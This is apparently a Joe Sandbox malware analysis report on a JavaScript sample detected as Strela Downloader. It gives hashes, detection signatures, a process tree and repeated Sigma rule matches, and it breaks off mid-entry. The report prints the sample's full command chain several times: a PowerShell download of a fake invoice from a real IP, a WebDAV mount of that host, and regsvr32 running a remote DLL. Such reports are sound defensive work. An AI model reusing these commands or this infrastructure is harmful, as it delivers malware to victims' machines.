Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2272523722022218526.js

Overview

General Information

Sample name:2272523722022218526.js
Analysis ID:1588854
MD5:847be9017f4bed6ca5a506fd9fd9e300
SHA1:21da425147ca69cac1e1ff843e22cc358fe03e1e
SHA256:a20086aad74b5d3cb8c4729ef3df9db87ed896a841bfea5f326dca1d4fe5f1e5
Tags:jsuser-threatcat_ch
Infos:

Detection

Strela Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Sigma detected: Powershell launch regsvr32
Yara detected Strela Downloader
Gathers information about network shares
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host checks user region and language preferences
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Potential DLL File Download Via PowerShell Invoke-WebRequest
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • wscript.exe (PID: 7364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7504 cmdline: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • Acrobat.exe (PID: 7784 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\invoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 8004 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 8184 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1748,i,16883510271714916648,17976950393990085260,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • cmd.exe (PID: 7800 cmdline: cmd /c net use \\193.143.1.205@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 7836 cmdline: net use \\193.143.1.205@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 7364JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7504, ProcessName: powershell.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7504, ProcessName: powershell.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ProcessId: 7364, ProcessName: wscript.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Hieu Tran: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7504, ProcessName: powershell.exe
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7364, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ProcessId: 7456, ProcessName: cmd.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2272523722022218526.js", ProcessId: 7364, ProcessName: wscript.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user~1\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\26323279126088.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7456, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user~1\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php", ProcessId: 7504, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.205@8888\davwwwroot\, CommandLine: net use \\193.143.1.205@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.205@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7800, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.205@8888\davwwwroot\, ProcessId: 7836, ProcessName: net.exe
    Source: Process startedAuthor: vburov: Data: Command: C:\W